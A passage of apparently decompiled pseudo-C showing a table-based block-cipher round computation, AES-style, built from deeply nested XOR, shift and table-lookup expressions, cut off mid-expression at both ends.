0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x18) * 4) ^  *(0x41beb0 + (_t110 & 0x000000ff) * 4) ^  *(_t181 - 4);
						_t182 = _t181 + 4;
						_t119 =  *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x18) * 4) ^  *(0x41beb0 + (_t110 & 0x000000ff) * 4) ^  *(_t181 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 